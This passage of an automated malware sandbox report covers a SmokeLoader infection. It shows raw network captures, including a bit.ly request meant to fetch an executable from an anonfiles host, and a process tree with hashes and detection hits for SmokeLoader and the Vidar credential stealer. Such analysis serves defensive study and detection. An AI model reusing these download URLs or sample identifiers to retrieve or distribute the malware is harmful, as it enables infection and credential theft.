00 74 00 45 00 57 00 6c 00 33 00 38 00 45 00 Data Ascii: vhWMsodw9GTZC93m4K8txcHD+elDgEI8l5txQkJFll9TwVMcc6frBfcYHwSqkavD28hd/rPivoG7uBOND+bPi5ZdTAHhgL3L2Qero8j3SxonVKECRn/LagC9tEWl38E
2022-01-09 17:48:12 UTC	448	IN	Data Raw: 00 4c 00 4e 00 77 00 71 00 5a 00 72 00 52 00 62 00 78 00 64 00 39 00 70 00 45 00 42 00 59 00 31 00 6d 00 6c 00 37 00 55 00 6d 00 75 00 6d 00 59 00 79 00 63 00 4b 00 4c 00 43 00 6b 00 69 00 4a 00 35 00 2f 00 37 00 6b 00 4f 00 2b 00 55 00 49 00 63 00 6e 00 64 00 4d 00 2b 00 33 00 59 00 78 00 64 00 39 00 67 00 6a 00 6c 00 53 00 49 00 67 00 58 00 43 00 56 00 76 00 4a 00 72 00 61 00 2f 00 2b 00 4d 00 49 00 73 00 5a 00 67 00 2f 00 69 00 4c 00 73 00 42 00 51 00 79 00 4b 00 46 00 76 00 4e 00 32 00 34 00 55 00 79 00 71 00 5a 00 75 00 61 00 33 00 31 00 6c 00 66 00 69 00 52 00 59 00 7a 00 71 00 50 00 50 00 65 00 4d 00 51 00 44 00 63 00 43 00 64 00 30 00 46 00 69 00 59 00 4f 00 6a 00 6d 00 4f 00 36 00 50 00 5a 00 6d 00 53 00 66 00 53 00 38 00 6f 00 65 00 48 00 77 00 Data Ascii: LNwqZrRbxd9pEBY1ml7UmumYycKLCkiJ5/7kO+UIcndM+3Yxd9gjlSIgXCVvJra/+MIsZg/iLsBQyKFvN24UyqZua31lfiRYzqPPeMQDcCd0FiYOjmO6PZmSfS8oeHw
2022-01-09 17:48:12 UTC	464	IN	Data Raw: 00 53 00 58 00 63 00 47 00 37 00 37 00 69 00 4a 00 31 00 4b 00 44 00 32 00 6f 00 50 00 7a 00 38 00 57 00 65 00 67 00 6f 00 78 00 6d 00 65 00 33 00 31 00 42 00 58 00 4a 00 2f 00 62 00 47 00 31 00 49 00 35 00 4a 00 58 00 2f 00 6d 00 61 00 53 00 62 00 50 00 49 00 65 00 68 00 4f 00 43 00 64 00 32 00 67 00 6e 00 58 00 71 00 70 00 2f 00 78 00 4f 00 64 00 39 00 44 00 46 00 59 00 46 00 38 00 62 00 68 00 52 00 41 00 42 00 41 00 55 00 48 00 31 00 72 00 69 00 43 00 4f 00 50 00 6c 00 59 00 61 00 58 00 32 00 59 00 68 00 46 00 36 00 74 00 5a 00 52 00 48 00 77 00 61 00 73 00 4d 00 75 00 4e 00 42 00 48 00 63 00 72 00 67 00 71 00 65 00 56 00 59 00 4c 00 78 00 6f 00 33 00 44 00 36 00 58 00 57 00 6b 00 33 00 4b 00 48 00 75 00 2b 00 47 00 62 00 41 00 6e 00 58 00 67 00 78 00 Data Ascii: SXcG77iJ1KD2oPz8Wegoxme31BXJ/bG1I5JX/maSbPIehOCd2gnXqp/xOd9DFYF8bhRABAUH1riCOPlYaX2YhF6tZRHwasMuNBHcrgqeVYLxo3D6XWk3KHu+GbAnXgx
2022-01-09 17:48:12 UTC	480	IN	Data Raw: 00 31 00 79 00 6a 00 49 00 6a 00 49 00 36 00 76 00 44 00 58 00 78 00 4d 00 58 00 4d 00 53 00 33 00 52 00 38 00 38 00 38 00 4e 00 55 00 41 00 62 00 54 00 62 00 46 00 6d 00 76 00 46 00 6f 00 73 00 6e 00 34 00 70 00 74 00 74 00 65 00 65 00 6c 00 68 00 57 00 65 00 42 00 35 00 66 00 4a 00 31 00 51 00 6f 00 52 00 59 00 78 00 38 00 39 00 6f 00 6b 00 34 00 72 00 41 00 61 00 65 00 64 00 55 00 6c 00 6b 00 55 00 75 00 46 00 66 00 73 00 55 00 66 00 77 00 49 00 6a 00 75 00 44 00 6e 00 54 00 68 00 39 00 61 00 48 00 34 00 38 00 73 00 47 00 57 00 4e 00 75 00 57 00 48 00 48 00 64 00 52 00 57 00 6e 00 48 00 55 00 2f 00 78 00 6d 00 32 00 65 00 57 00 4e 00 2b 00 2f 00 52 00 37 00 49 00 77 00 58 00 4f 00 31 00 32 00 74 00 66 00 6c 00 43 00 79 00 58 00 61 00 2f 00 6b 00 63 00 Data Ascii: 1yjIjI6vDXxMXMS3R888NUAbTbFmvFosn4ptteelhWeB5fJ1QoRYx89ok4rAaedUlkUuFfsUfwIjuDnTh9aH48sGWNuWHHdRWnHU/xm2eWN+/R7IwXO12tflCyXa/kc
2022-01-09 17:48:12 UTC	496	IN	Data Raw: 00 77 00 36 00 74 00 46 00 77 00 2f 00 47 00 72 00 61 00 65 00 39 00 58 00 41 00 6c 00 75 00 6a 00 36 00 4e 00 4f 00 73 00 43 00 4f 00 7a 00 6b 00 66 00 34 00 7a 00 6e 00 6f 00 42 00 77 00 38 00 46 00 45 00 53 00 61 00 67 00 32 00 6d 00 38 00 38 00 37 00 64 00 78 00 6b 00 33 00 59 00 35 00 6c 00 36 00 65 00 74 00 62 00 6e 00 67 00 52 00 2b 00 34 00 58 00 45 00 76 00 6f 00 31 00 51 00 58 00 71 00 38 00 52 00 6a 00 61 00 52 00 71 00 74 00 72 00 53 00 36 00 55 00 4c 00 50 00 63 00 64 00 41 00 35 00 6d 00 39 00 34 00 6e 00 4d 00 51 00 57 00 59 00 45 00 6d 00 64 00 74 00 32 00 6c 00 30 00 5a 00 33 00 39 00 76 00 4c 00 38 00 72 00 6c 00 52 00 47 00 7a 00 45 00 6c 00 65 00 69 00 2b 00 76 00 65 00 74 00 51 00 31 00 35 00 46 00 63 00 57 00 30 00 67 00 52 00 4e 00 Data Ascii: w6tFw/Grae9XAluj6NOsCOzkf4znoBw8FESag2m887dxk3Y5l6etbngR+4XEvo1QXq8RjaRqtrS6ULPcdA5m94nMQWYEmdt2l0Z39vL8rlRGzElei+vetQ15FcW0gRN
2022-01-09 17:48:12 UTC	512	IN	Data Raw: 00 6f 00 4d 00 36 00 74 00 69 00 46 00 4e 00 6f 00 2b 00 31 00 45 00 4e 00 44 00 65 00 35 00 69 00 6a 00 4f 00 4d 00 4d 00 41 00 34 00 4a 00 76 00 44 00 75 00 50 00 79 00 7a 00 56 00 35 00 6b 00 6e 00 4c 00 4c 00 79 00 6f 00 75 00 33 00 71 00 6e 00 2b 00 2f 00 48 00 69 00 61 00 71 00 47 00 67 00 35 00 63 00 31 00 57 00 4e 00 4a 00 32 00 4c 00 34 00 6d 00 4d 00 50 00 65 00 6f 00 2b 00 73 00 4f 00 7a 00 4a 00 6c 00 34 00 73 00 69 00 78 00 46 00 41 00 6b 00 73 00 62 00 56 00 4c 00 4a 00 68 00 6d 00 37 00 62 00 53 00 43 00 48 00 6a 00 5a 00 66 00 4d 00 61 00 69 00 6d 00 43 00 44 00 4e 00 75 00 50 00 57 00 42 00 79 00 49 00 51 00 69 00 74 00 51 00 67 00 4f 00 4c 00 6d 00 78 00 6c 00 32 00 78 00 62 00 2f 00 31 00 46 00 63 00 45 00 67 00 6a 00 4c 00 71 00 55 00 Data Ascii: oM6tiFNo+1ENDe5ijOMMA4JvDuPyzV5knLLyou3qn+/HiaqGg5c1WNJ2L4mMPeo+sOzJl4sixFAksbVLJhm7bSCHjZfMaimCDNuPWByIQitQgOLmxl2xb/1FcEgjLqU

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49875	67.199.248.10	443	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
2022-01-09 17:48:56 UTC	527	OUT	GET /3eHgQQR HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: bit.ly
2022-01-09 17:48:56 UTC	527	IN	HTTP/1.1 302 Found Server: nginx Date: Sun, 09 Jan 2022 17:48:56 GMT Content-Type: text/html; charset=utf-8 Content-Length: 226 Cache-Control: private, max-age=90 Content-Security-Policy: referrer always; Location: https://bitly.com/a/blocked?hash=3eHgQQR&url=https%3A%2F%2Fcdn-131.anonfiles.com%2FP0m5w4j2xc%2Fcac3eb98-1640853984%2F%40Cryptobat9.exe Referrer-Policy: unsafe-url Via: 1.1 google Alt-Svc: clear Connection: close
2022-01-09 17:48:56 UTC	527	IN	Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 42 69 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 69 74 6c 79 2e 63 6f 6d 2f 61 2f 62 6c 6f 63 6b 65 64 3f 68 61 73 68 3d 33 65 48 67 51 51 52 26 61 6d 70 3b 75 72 6c 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 63 64 6e 2d 31 33 31 2e 61 6e 6f 6e 66 69 6c 65 73 2e 63 6f 6d 25 32 46 50 30 6d 35 77 34 6a 32 78 63 25 32 46 63 61 63 33 65 62 39 38 2d 31 36 34 30 38 35 33 39 38 34 25 32 46 25 34 30 43 72 79 70 74 6f 62 61 74 39 2e 65 78 65 22 3e 6d 6f 76 65 64 20 68 65 72 65 3c 2f 61 3e 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>Bitly</title></head><body><a href="https://bitly.com/a/blocked?hash=3eHgQQR&url=https%3A%2F%2Fcdn-131.anonfiles.com%2FP0m5w4j2xc%2Fcac3eb98-1640853984%2F%40Cryptobat9.exe">moved here</a></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.3	49876	67.199.248.14	443	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
2022-01-09 17:48:56 UTC	527	OUT	GET /a/blocked?hash=3eHgQQR&url=https%3A%2F%2Fcdn-131.anonfiles.com%2FP0m5w4j2xc%2Fcac3eb98-1640853984%2F%40Cryptobat9.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: bitly.com
2022-01-09 17:48:56 UTC	528	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 09 Jan 2022 17:48:56 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 5879 Set-Cookie: anon_u=cHN1X19jYTM2NTgxNy01ZjI1LTQwN2QtOTg5OC01ZWMzNzc4ZThiNzQ=\|1641750536\|4ae746a92e36fb00e2fd89f606bf782821d9376f; Domain=bitly.com; expires=Fri, 08 Jul 2022 17:48:56 GMT; httponly; Path=/; secure Etag: "c19624a6e02662e870f645f063e54797e509758d" Pragma: no-cache Cache-Control: no-cache, no-store, max-age=0, must-revalidate X-Frame-Options: DENY P3p: CP="CAO PSA OUR" Strict-Transport-Security: max-age=31536000 Via: 1.1 google Alt-Svc: clear Connection: close
2022-01-09 17:48:56 UTC	528	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 57 61 72 6e 69 6e 67 21 20 7c 20 54 68 65 72 65 20 6d 69 67 68 74 20 62 65 20 61 20 70 72 6f 62 6c 65 6d 20 77 69 74 68 20 74 68 65 20 72 65 71 75 65 73 74 65 64 20 6c 69 6e 6b 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d Data Ascii: <!DOCTYPE html><html><head><title>Warning! \| There might be a problem with the requested link</title><meta name="viewport" content="width=device-width, initial-scale=1"><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name=
2022-01-09 17:48:56 UTC	529	IN	Data Raw: 20 22 50 72 6f 78 69 6d 61 20 4e 6f 76 61 22 3b 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 38 30 30 3b 0a 73 72 63 3a 20 75 72 6c 28 27 2f 73 2f 76 34 36 38 2f 67 72 61 70 68 69 63 73 2f 50 72 6f 78 69 6d 61 4e 6f 76 61 2d 45 78 74 72 61 62 6f 6c 64 2e 6f 74 66 27 29 20 66 6f 72 6d 61 74 28 22 6f 70 65 6e 74 79 70 65 22 29 3b 0a 7d 0a 62 6f 64 79 2c 0a 68 74 6d 6c 20 7b 0a 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 50 72 6f 78 69 6d 61 20 4e 6f 76 61 22 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 20 61 6e 74 69 61 6c 69 61 73 65 64 3b 0a 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 70 78 3b 0a 63 6f 6c 6f 72 3a 20 23 31 64 31 66 32 31 3b 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 Data Ascii: "Proxima Nova";font-weight: 800;src: url('/s/v468/graphics/ProximaNova-Extrabold.otf') format("opentype");}body,html {font-family: "Proxima Nova", Arial, sans-serif;-webkit-font-smoothing: antialiased;font-size: 10px;color: #1d1f21;background-c
2022-01-09 17:48:56 UTC	530	IN	Data Raw: 64 69 6e 67 3a 20 37 25 20 35 25 20 31 34 25 20 35 25 3b 0a 7d 0a 2e 68 65 61 64 65 72 20 7b 0a 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 72 65 6d 3b 0a 7d 0a 2e 68 65 61 64 6c 69 6e 65 2d 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 68 65 61 64 6c 69 6e 65 20 7b 0a 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 7d 0a 2e 77 61 72 6e 69 6e 67 2d 69 6d 67 20 7b 0a 77 69 64 74 68 3a 20 35 30 25 3b 0a 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 20 32 72 65 6d 3b 0a 7d 0a 7d 0a 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 37 35 30 70 78 29 20 7b 0a 2e 77 61 72 6e 69 6e 67 2d 69 6d 67 20 7b 0a 77 69 64 74 68 Data Ascii: ding: 7% 5% 14% 5%;}.header {margin-bottom: 2rem;}.headline-container {flex-direction: column;justify-content: center;}.headline {width: 100%;}.warning-img {width: 50%;margin: 0 auto 2rem;}}@media (max-width: 750px) {.warning-img {width
2022-01-09 17:48:56 UTC	531	IN	Data Raw: 20 6d 61 6c 77 61 72 65 20 28 73 6f 66 74 77 61 72 65 20 64 65 73 69 67 6e 65 64 20 74 6f 20 68 61 72 6d 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 29 2c 20 61 74 74 65 6d 70 74 20 74 6f 20 63 6f 6c 6c 65 63 74 20 79 6f 75 72 20 70 65 72 73 6f 6e 61 6c 0a 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 66 6f 72 20 6e 65 66 61 72 69 6f 75 73 20 70 75 72 70 6f 73 65 73 2c 20 6f 72 20 6f 74 68 65 72 77 69 73 65 20 63 6f 6e 74 61 69 6e 20 68 61 72 6d 66 75 6c 20 61 6e 64 2f 6f 72 20 69 6c 6c 65 67 61 6c 20 63 6f 6e 74 65 6e 74 2e 3c 2f 6c 69 3e 0a 3c 6c 69 3e 54 68 65 20 6c 69 6e 6b 20 6d 61 79 20 62 65 20 61 74 74 65 6d 70 74 69 6e 67 20 74 6f Data Ascii: malware (software designed to harm your computer), attempt to collect your personalinformation for nefarious purposes, or otherwise contain harmful and/or illegal content.</li><li>The link may be attempting to
2022-01-09 17:48:56 UTC	532	IN	Data Raw: 20 68 69 64 65 20 74 68 65 20 66 69 6e 61 6c 20 64 65 73 74 69 6e 61 74 69 6f 6e 2e 3c 2f 6c 69 3e 0a 3c 6c 69 3e 54 68 65 20 6c 69 6e 6b 20 6d 61 79 20 6c 65 61 64 20 74 6f 20 61 20 66 6f 72 67 65 72 79 20 6f 66 20 61 6e 6f 74 68 65 72 20 77 65 62 73 69 74 65 20 6f 72 20 6d 61 79 20 69 6e 66 72 69 6e 67 65 20 74 68 65 20 72 69 67 68 74 73 20 6f 66 20 6f 74 68 65 72 73 2e 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 70 3e 0a 49 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 6c 69 6e 6b 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 42 69 74 6c 79 20 76 69 61 20 3c 73 70 61 6e 3e 3c 61 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 0a 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 Data Ascii: hide the final destination.</li><li>The link may lead to a forgery of another website or may infringe the rights of others.</li></ul><p>If you believe this link has been blocked in error, please contact Bitly via <span><a target="_blank"rel="noopene
2022-01-09 17:48:56 UTC	533	IN	Data Raw: 20 54 72 61 63 6b 20 70 61 67 65 20 76 69 65 77 0a 77 2e 67 61 28 27 73 65 6e 64 27 2c 20 27 70 61 67 65 76 69 65 77 27 29 3b 0a 0a 7d 29 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 76 61 72 20 63 61 74 65 67 6f 72 79 20 3d 20 22 73 70 61 6d 3a 77 61 72 6e 69 6e 67 5f 70 61 67 65 22 2c 0a 73 74 61 74 65 20 3d 20 30 3b 0a 66 75 6e 63 74 69 6f 6e 20 74 72 61 63 6b 48 6f 76 65 72 28 65 29 20 7b 0a 74 72 79 20 7b 0a 73 74 61 74 65 20 3d 20 31 3b 0a 67 61 28 27 73 65 6e 64 27 2c 20 27 65 76 65 6e 74 27 2c 20 63 61 74 65 67 6f 72 79 2c 20 22 53 70 61 6d 20 69 6e 74 65 72 73 74 69 Data Ascii: Track page vieww.ga('send', 'pageview');})(window,document);</script><script type="text/javascript">(function () {var category = "spam:warning_page",state = 0;function trackHover(e) {try {state = 1;ga('send', 'event', category, "Spam intersti

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: cz2ZyeL2Zd.exe PID: 6920 Parent PID: 5272

General

Start time:	18:46:57
Start date:	09/01/2022
Path:	C:\Users\user\Desktop\cz2ZyeL2Zd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\cz2ZyeL2Zd.exe"
Imagebase:	0x400000
File size:	299008 bytes
MD5 hash:	246B41453B996BFA14F60D4785E598AC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: cz2ZyeL2Zd.exe PID: 7052 Parent PID: 6920

General

Start time:	18:46:59
Start date:	09/01/2022
Path:	C:\Users\user\Desktop\cz2ZyeL2Zd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\cz2ZyeL2Zd.exe"
Imagebase:	0x400000
File size:	299008 bytes
MD5 hash:	246B41453B996BFA14F60D4785E598AC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000003.00000002.328560589.0000000000580000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000003.00000002.328581526.00000000005A1000.00000004.00020000.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: svchost.exe PID: 7140 Parent PID: 572

General

Start time:	18:47:02
Start date:	09/01/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Imagebase:	0x7ff70d6e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 6200 Parent PID: 572

General

Start time:	18:47:02
Start date:	09/01/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Imagebase:	0x7ff70d6e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 3796 Parent PID: 572

General

Start time:	18:47:03
Start date:	09/01/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Imagebase:	0x7ff70d6e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 6260 Parent PID: 572

General

Start time:	18:47:03
Start date:	09/01/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k NetworkService -p
Imagebase:	0x7ff70d6e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 5944 Parent PID: 572

General

Start time:	18:47:03
Start date:	09/01/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k unistacksvcgroup
Imagebase:	0x7ff70d6e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: SgrmBroker.exe PID: 6064 Parent PID: 572

General

Start time:	18:47:04
Start date:	09/01/2022
Path:	C:\Windows\System32\SgrmBroker.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\SgrmBroker.exe
Imagebase:	0x7ff6db2f0000
File size:	163336 bytes
MD5 hash:	D3170A3F3A9626597EEE1888686E3EA6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 5504 Parent PID: 572

General

Start time:	18:47:04
Start date:	09/01/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Imagebase:	0x7ff70d6e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 6804 Parent PID: 572

General

Start time:	18:47:05
Start date:	09/01/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff70d6e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: explorer.exe PID: 3352 Parent PID: 7052

General

Start time:	18:47:06
Start date:	09/01/2022
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff720ea0000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000D.00000000.316265354.0000000002E01000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 6444 Parent PID: 572

General

Start time:	18:47:21
Start date:	09/01/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff70d6e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 7008 Parent PID: 572

General

Start time:	18:47:35
Start date:	09/01/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff70d6e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: icgujuh PID: 7124 Parent PID: 664

General

Start time:	18:47:37
Start date:	09/01/2022
Path:	C:\Users\user\AppData\Roaming\icgujuh
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\icgujuh
Imagebase:	0x400000
File size:	299008 bytes
MD5 hash:	246B41453B996BFA14F60D4785E598AC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: icgujuh PID: 5608 Parent PID: 7124

General

Start time:	18:47:39
Start date:	09/01/2022
Path:	C:\Users\user\AppData\Roaming\icgujuh
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\icgujuh
Imagebase:	0x400000
File size:	299008 bytes
MD5 hash:	246B41453B996BFA14F60D4785E598AC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000012.00000002.377828277.0000000000680000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000012.00000002.377862377.00000000006A1000.00000004.00020000.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: svchost.exe PID: 7116 Parent PID: 572

General

Start time:	18:47:45
Start date:	09/01/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff70d6e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: 5D68.exe PID: 1764 Parent PID: 3352

General

Start time:	18:47:47
Start date:	09/01/2022
Path:	C:\Users\user\AppData\Local\Temp\5D68.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\5D68.exe
Imagebase:	0x400000
File size:	358912 bytes
MD5 hash:	1F935BFFF0F8128972BC69625E5B2A6C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000016.00000002.398652642.00000000023A1000.00000004.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000016.00000002.398263748.0000000000600000.00000004.00000001.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 37%, Metadefender, Browse Detection: 86%, ReversingLabs

Chronological Activities

Analysis Process: EC9F.exe PID: 6732 Parent PID: 3352

General

Start time:	18:47:59
Start date:	09/01/2022
Path:	C:\Users\user\AppData\Local\Temp\EC9F.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\EC9F.exe
Imagebase:	0x400000
File size:	330752 bytes
MD5 hash:	7442C55E6C71DA88E75CEF4A0B4B62CC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000017.00000002.413054469.0000000002E46000.00000004.00000020.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000017.00000002.413054469.0000000002E46000.00000004.00000020.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: 2B8.exe PID: 5780 Parent PID: 3352

General

Start time:	18:48:05
Start date:	09/01/2022
Path:	C:\Users\user\AppData\Local\Temp\2B8.exe
